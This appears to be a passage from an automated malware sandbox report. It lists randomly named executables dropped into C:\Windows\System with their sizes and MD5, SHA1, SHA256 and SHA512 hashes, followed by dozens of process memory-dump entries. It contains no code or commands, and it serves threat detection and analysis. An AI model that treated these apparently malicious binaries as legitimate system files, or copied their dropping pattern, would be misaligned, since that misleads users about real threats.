3ca2b6b9577af01b3a3620336bc7633cdf131b8ef3dbec97be2ed51dd9ab574aabe9e4b55e78b7ddd40112fd7a298e9077f1deb7e88ec4adccececf01bc54a0e

Download Submit
C:\Windows\System\vzJkLiL.exe

Filesize
1.9MB

MD5
6c63f0e29924e967701f3d327e474023

SHA1
5b1a29bc1718a523e73dd3ae5bb193db56e6d224

SHA256
a0c20c5803fabdaee899c9ffb5bc4d595b382e3c4e77e4b7acd564444960cc9f

SHA512
6d2c2e4e83a4a6296f1045d2c8ce89e843740d22f9e54f4765f9ea1be13f505a6a855db4ee2afb5ab708ca3c6ae476d7536fe1adfe5a7a13e923d2a2895b41f3

Download Submit
C:\Windows\System\wHmEJWG.exe

Filesize
1.9MB

MD5
a34c0b1d03bfc3fba66fbc428f96e37c

SHA1
41da4b0ce15f2b53c1dede84ccd9721430b53492

SHA256
a03554b931b2ea0cb134d529e5854ca6008d88e91aa38b23393fb43d27160e88

SHA512
66339bd0cccd55310998c4c56cacab2d6c358e9959253002bfd05e70aa0c509f24ae2f961c2014837f1e06621d329d5475ecc5afa487731ff4723409bbf5ed8c

Download Submit
C:\Windows\System\xanDdLS.exe

Filesize
1.9MB

MD5
4d4d0ef0715c056826d758db8e7da3cd

SHA1
c113e775000102d0c22e8d8cf05630b1997454e7

SHA256
7fbd3a3515c73623ba71bff9217c0157dbc562970f7b25f9d64c3198322ae2d6

SHA512
5d3b11c77e128dd1f7098633db3b55de0a623c2436acdfc686b1d75b332264781327d076914e0a15bbc47a1064cc0bb18afea1c1713a4da79d978bf1ccdb8fb0

Download Submit
C:\Windows\System\yiSRTrm.exe

Filesize
1.9MB

MD5
58fa5eb4e926ee936eaafa6be3d5c174

SHA1
e6f62f4df1f8ccbf127b18e6e7e341fb6d80c410

SHA256
e6935a05116f6584ac4fba4194842e954442bb7de0f6877301ae1b37013e16e2

SHA512
09042e3d7d568eae1b1b249c1c73e1a2035884237acfaefe1e697e194ee5757c73d24a43452586627ebb4afa76d5ad5b72f563853cd48f30ef8b70691039ebb6

Download Submit
C:\Windows\System\yyPhrmd.exe

Filesize
1.9MB

MD5
614852ac25400f5b586c30f76d588f4c

SHA1
30eb81e9ac793f04409ae40571d5db79789bb98d

SHA256
16c701aabe7efea5242dda652df1ea592174d29c3f4acf656ddadd002d03716e

SHA512
30c828f1d063d6120e45b9f2487907e426d1a96793a1eb912943258a922b4c539d25e081e8f5d117261bd7697cfdf7264ac008a7a77aef2036c50e1fe85adfe6

Download Submit
C:\Windows\System\zMrMvmJ.exe

Filesize
1.9MB

MD5
bfd21be63e5fff303d8c3c95e58e3808

SHA1
6b359555877ecd06b49638b153e7389bdc61a2e5

SHA256
bea83f47b28d0bcc12f53dd6e1b9123a171ba4aef5280e1aaf15449d67bbd899

SHA512
ce0a3a96de76ab27ae851d04de9463683999e7b6568934ef10cefed2cb336c00bf392436cd621c61d29c36028419f66caaafbeb57ba86bcd1762362afee3ac46

Download Submit
memory/340-160-0x00007FF7934A0000-0x00007FF793892000-memory.dmp

Filesize
3.9MB

Download
memory/340-2878-0x00007FF7934A0000-0x00007FF793892000-memory.dmp

Filesize
3.9MB

Download
memory/944-139-0x00007FF62EA80000-0x00007FF62EE72000-memory.dmp

Filesize
3.9MB

Download
memory/944-2867-0x00007FF62EA80000-0x00007FF62EE72000-memory.dmp

Filesize
3.9MB

Download
memory/1028-2879-0x00007FF7A8F30000-0x00007FF7A9322000-memory.dmp

Filesize
3.9MB

Download
memory/1028-365-0x00007FF7A8F30000-0x00007FF7A9322000-memory.dmp

Filesize
3.9MB

Download
memory/1120-1181-0x00007FF65CE70000-0x00007FF65D262000-memory.dmp

Filesize
3.9MB

Download
memory/1120-2859-0x00007FF65CE70000-0x00007FF65D262000-memory.dmp

Filesize
3.9MB

Download
memory/1120-6-0x00007FF65CE70000-0x00007FF65D262000-memory.dmp

Filesize
3.9MB

Download
memory/1476-319-0x00007FF65F120000-0x00007FF65F512000-memory.dmp

Filesize
3.9MB

Download
memory/1476-2893-0x00007FF65F120000-0x00007FF65F512000-memory.dmp

Filesize
3.9MB

Download
memory/1668-2862-0x00007FF7A1EA0000-0x00007FF7A2292000-memory.dmp

Filesize
3.9MB

Download
memory/1668-78-0x00007FF7A1EA0000-0x00007FF7A2292000-memory.dmp

Filesize
3.9MB

Download
memory/1780-2832-0x00007FF67B510000-0x00007FF67B902000-memory.dmp

Filesize
3.9MB

Download
memory/1780-389-0x00007FF67B510000-0x00007FF67B902000-memory.dmp

Filesize
3.9MB

Download
memory/2008-157-0x00007FF75D0B0000-0x00007FF75D4A2000-memory.dmp

Filesize
3.9MB

Download
memory/2008-2869-0x00007FF75D0B0000-0x00007FF75D4A2000-memory.dmp

Filesize
3.9MB

Download
memory/2096-405-0x00007FF722C80000-0x00007FF723072000-memory.dmp

Filesize
3.9MB

Download
memory/2096-2930-0x00007FF722C80000-0x00007FF723072000-memory.dmp

Filesize
3.9MB

Download
memory/2140-323-0x00007FF68EBA0000-0x00007FF68EF92000-memory.dmp

Filesize
3.9MB

Download
memory/2140-2891-0x00007FF68EBA0000-0x00007FF68EF92000-memory.dmp

Filesize
3.9MB

Download
memory/2176-2819-0x00007FFD35BC0000-0x00007FFD36681000-memory.dmp

Filesize
10.8MB

Download
memory/2176-1576-0x00007FFD35BC0000-0x00007FFD36681000-memory.dmp

Filesize
10.8MB

Download
memory/2176-388-0x00007FFD35BC0000-0x00007FFD36681000-memory.dmp

Filesize
10.8MB

Download
memory/2176-1437-0x00007FFD35BC3000-0x00007FFD35BC5000-memory.dmp

Filesize
8KB

Download
memory/2176-1308-0x00007FFD35BC0000-0x00007FFD36681000-memory.dmp

Filesize
10.8MB

Download
memory/2176-421-0x000001D7F31F0000-0x000001D7F3996000-memory.dmp

Filesize
7.6MB

Download
memory/2176-7-0x00007FFD35BC3000-0x00007FFD35BC5000-memory.dmp

Filesize
8KB

Download
memory/2176-54-0x00007FFD35BC0000-0x00007FFD36681000-memory.dmp

Filesize
10.8MB

Download
memory/2176-74-0x000001D7F25E0000-0x000001D7F2602000-memory.dmp

Filesize
136KB

Download
memory/2424-170-0x00007FF7D5D20000-0x00007FF7D6112000-memory.dmp

Filesize
3.9MB

Download
memory/2424-2874-0x00007FF7D5D20000-0x00007FF7D6112000-memory.dmp

Filesize
3.9MB

Download
memory/2644-1-0x0000023A68010000-0x0000023A68020000-memory.dmp

Filesize
64KB

Download
memory/2644-1300-0x00007FF7C8DB0000-0x00007FF7C91A2000-memory.dmp

Filesize
3.9MB

Download
memory/2644-0-0x00007FF7C8DB0000-0x00007FF7C91A2000-memory.dmp

Filesize
3.9MB

Download
memory/2660-120-0x00007FF7C9D60000-0x00007FF7CA152000-memory.dmp

Filesize
3.9MB

Download
memory/2660-2865-0x00007FF7C9D60000-0x00007FF7CA152000-memory.dmp

Filesize
3.9MB

Download
memory/2912-311-0x00007FF7E6310000-0x00007FF7E6702000-memory.dmp

Filesize
3.9MB

Download
memory/2912-2875-0x00007FF7E6310000-0x00007FF7E6702000-memory.dmp

Filesize
3.9MB

Download
memory/3076-305-0x00007FF7EDD50000-0x00007FF7EE142000-memory.dmp

Filesize
3.9MB

Download
memory/3076-2871-0x00007FF7EDD50000-0x00007FF7EE142000-memory.dmp

Filesize
3.9MB

Download
memory/3400-2889-0x00007FF671540000-0x00007FF671932000-memory.dmp

Filesize
3.9MB

Download
memory/3400-378-0x00007FF671540000-0x00007FF671932000-memory.dmp

Filesize
3.9MB

Download
memory/3476-2863-0x00007FF7971D0000-0x00007FF7975C2000-memory.dmp

Filesize
3.9MB

Download
memory/3476-100-0x00007FF7971D0000-0x00007FF7975C2000-memory.dmp

Filesize
3.9MB

Download
memory/3524-320-0x00007FF7852B0000-0x00007FF7856A2000-memory.dmp

Filesize
3.9MB

Download
memory/3524-2920-0x00007FF7852B0000-0x00007FF7856A2000-memory.dmp

Filesize
3.9MB

Download
memory/3872-2887-0x00007FF693790000-0x00007FF693B82000-memory.dmp

Filesize
3.9MB

Download
memory/3872-393-0x00007FF693790000-0x00007FF693B82000-memory.dmp

Filesize
3.9MB

Download
memory/4048-333-0x00007FF6842C0000-0x00007FF6846B2000-memory.dmp

Filesize
3.9MB

Download
memory/4048-2882-0x00007FF6842C0000-0x00007FF6846B2000-memory.dmp

Filesize
3.9MB

Download
memory/4348-2884-0x00007FF64C910000-0x00007FF64CD02000-memory.dmp

Filesize
3.9MB

Download
memory/4348-400-0x00007FF64C910000-0x00007FF64CD02000-memory.dmp

Filesize
3.9MB

Download
memory/4492-2885-0x00007FF6F58B0000-0x00007FF6F5CA2000-memory.dmp

Filesize
3.9MB

Download
memory/4492-312-0x00007FF6F58B0000-0x00007FF6F5CA2000-memory.dmp

Filesize
3.9MB

Download
memory/4652-2921-0x00007FF65E160000-0x00007FF65E552000-memory.dmp

Filesize
3.9MB

Download
memory/4652-372-0x00007FF65E160000-0x00007FF65E552000-memory.dmp

Filesize
3.9MB

Download
memory/4836-361-0x00007FF61CF40000-0x00007FF61D332000-memory.dmp

Filesize
3.9MB

Download
memory/4836-2923-0x00007FF61CF40000-0x00007FF61D332000-memory.dmp

Filesize
3.9MB

Download
memory/4848-369-0x00007FF7A4560000-0x00007FF7A4952000-memory.dmp

Filesize
3.9MB

Download
memory/4848-2917-0x00007FF7A4560000-0x00007FF7A4952000-memory.dmp

Filesize
3.9MB

Download